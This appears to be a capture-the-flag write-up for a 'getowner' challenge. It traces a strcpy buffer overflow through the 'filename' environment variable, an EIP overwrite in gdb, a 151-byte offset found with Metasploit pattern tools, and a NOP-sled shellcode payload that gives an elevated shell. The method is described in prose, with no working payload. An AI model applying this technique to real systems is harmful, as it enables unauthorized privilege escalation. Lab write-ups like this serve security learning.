This challenge welcomes us with the files:
getowner and
getowner.c in our level2 home directory. This is great, as it's always nice when challenges come with some source code. Running the application displays the error, "No filename configured!" Providing some arguments also doesn't seem to change anything.
 |
| Running getowner and some arguments |
Since this doesn't seem to be very helpful, I decide to take a quick look at the source. Taking a cursory look at the code, it's easily identifiable that there is a buffer overflow by using
strcpy().
 |
Vulnerable code
|
Reading more of the code helps me understand how to go about this challenge. It appears it's looking for an environment variable named
filename. Setting this and re-running the binary quickly shows that this is the intended use of the program.
 |
| Getowner running with filename envar set |
The code shows the name the value of filename being put into an unbounded buffer. Armed with this information, it's apparent how to go about this: we must perform a buffer over flow by having a really long value in the envar filename.
 |
| Triggering the buffer overflow |
It appears we are correct! Now that we know how to successfully trigger the vulnerability, it's time to get down and dirty with gdb and get our exploit ready.
 |
| EIP is overwritten |
We can see here that eip has been overwritten with the A's we set in our filename envar. Things are looking good for us right now. The next thing I wanted to do was calculate the distance to the return address. To do this I used Metasploit's pattern_create.rb and pattern_offset.rb tools. This returned a buffer space of 151.
Now all we need to do is craft up our special
filename envar with [nops][shellcode][ret] and we should be good to go!
 |
| Elevated shell |
